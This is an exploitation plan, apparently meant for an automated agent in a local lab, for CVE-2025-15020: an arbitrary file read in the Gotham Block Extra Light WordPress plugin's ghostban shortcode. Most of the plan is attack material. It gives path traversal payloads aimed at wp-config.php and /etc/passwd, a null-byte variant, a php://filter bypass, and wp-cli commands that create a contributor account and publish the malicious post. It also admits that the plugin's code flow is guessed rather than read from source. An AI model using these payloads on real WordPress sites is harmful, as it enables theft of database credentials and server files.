Gotham Block Extra Light <= 1.5.0 - Authenticated (Contributor+) Arbitrary File Read via 'ghostban' Shortcode

This plan outlines the research and exploitation strategy for CVE-2025-15020, an Arbitrary File Read vulnerability in the Gotham Block Extra Light plugin (<= 1.5.0) via the ghostban shortcode.

---

1. Vulnerability Summary

The Gotham Block Extra Light plugin registers a shortcode named ghostban. This shortcode's handler function likely accepts an attribute (e.g., src, file, or url) that defines a file path to be read or included. Due to a lack of path validation and sanitization (Improper Limitation of a Pathname to a Restricted Directory), an authenticated user with Contributor-level permissions can provide a path traversal payload (e.g., ../../../../wp-config.php) to read sensitive files from the server.

2. Attack Vector Analysis

• Entry Point: The ghostban shortcode processed within WordPress post/page content.
• Authentication Level: Authenticated (Contributor+). Contributors can create and preview posts.
• Vulnerable Parameter: An attribute of the [ghostban] shortcode (e.g., src or file).
• Preconditions: The plugin gotham-block-extra-light must be active. The attacker must have a user account with at least contributor role.

3. Code Flow (Inferred)

1. Registration: The plugin calls add_shortcode( 'ghostban', 'callback_function' ) during initialization (likely in init or the main plugin file).
2. Execution: When a post containing [ghostban ...] is viewed or previewed, WordPress calls the callback_function.
3. Attribute Handling: The callback uses shortcode_atts() to parse attributes. One of these attributes is used as a file path.
4. The Sink: The callback passes this attribute into a file-reading function like file_get_contents(), readfile(), or include() without using basename() or validating that the path resides within the plugin's intended directory.

4. Nonce Acquisition Strategy

Shortcodes are typically processed as part of the content rendering pipeline. Unlike AJAX or REST API endpoints, shortcode rendering does not require a nonce. The "authorization" is the ability to create or edit a post where the shortcode can be placed.

However, if the shortcode handler relies on any localized data for JS-based rendering (unlikely for a simple file read):

1. Check for wp_localize_script in the plugin source.
2. Use browser_eval to extract variables if they contain hints about the attribute names.

5. Exploitation Strategy

Step 1: Discover Attribute Name

Since the source is not provided, we must first identify which attribute the ghostban shortcode uses.

• Action: Grep the plugin directory for the shortcode registration.
• Command: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/gotham-block-extra-light/
• Identification: Find the function name, then grep for that function to see the attribute keys (e.g., src, file, template).

Step 2: Create Malicious Post

Create a post as a Contributor containing the traversal payload.

• Payload Example: [ghostban src="../../../../../wp-config.php"] (assuming src is the attribute).

Step 3: Trigger the Read

View the post (or its preview) via a logged-in session.

• Tool: http_request (Playwright) or browser_navigate.
• Target URL: http://localhost:8080/?p=[POST_ID] or the preview URL.

6. Test Data Setup

1. Install Plugin: Ensure gotham-block-extra-light version <= 1.5.0 is installed and active.
2. Create User:

   wp user create attacker attacker@example.com --role=contributor --user_pass=password
   

3. Identify Target File: We will aim to read /etc/passwd (Linux system file) or wp-config.php (WordPress configuration).

7. Expected Results

• The HTTP response for the post view will contain the raw text of the requested file (e.g., DB_PASSWORD from wp-config.php or user definitions from /etc/passwd).
• The data will likely appear within the <div> or container where the shortcode output is rendered.

8. Verification Steps

1. Primary: Check the response body of the http_request for the string root:x:0:0 (if reading /etc/passwd) or DB_NAME (if reading wp-config.php).
2. Comparison: Verify that the content matches the actual file on disk.

   cat /var/www/html/wp-config.php
   

9. Alternative Approaches

• Different Attributes: If src fails, try file, path, url, id, name, template.
• Null Byte Injection: If the plugin appends an extension (e.g., .php), try [ghostban src="../../../../../etc/passwd%00"] (though this only works on very old PHP versions).
• Wrappers: Try PHP filters to bypass simple checks: [ghostban src="php://filter/convert.base64-encode/resource=../../wp-config.php"].
• Preview Mode: If the post isn't published, use the preview URL: http://localhost:8080/?p=[POST_ID]&preview=true. Note that this might require capturing the session cookie of the contributor.

10. Implementation Plan for Automated Agent

1. Recon:
   • ls -R /var/www/html/wp-content/plugins/gotham-block-extra-light/
   • grep -r "add_shortcode.*ghostban" /var/www/html/wp-content/plugins/gotham-block-extra-light/
2. Analysis:
   • Find the callback function.
   • Examine the callback to find shortcode_atts and the file system sink (e.g. include, file_get_contents).
3. Execution:
   • wp user create contributor_user user@test.com --role=contributor --user_pass=password
   • wp post create --post_author=$(wp user get contributor_user --field=ID) --post_content='[ghostban src="../../../../../../../etc/passwd"]' --post_status=publish --post_title='Vulnerability Test'
   • Identify the post URL: wp post list --post_type=post --name='Vulnerability Test' --field=guid
   • Perform http_request to the post URL.
4. Cleanup:
   • wp post delete [POST_ID] --force
   • wp user delete contributor_user --reassign=1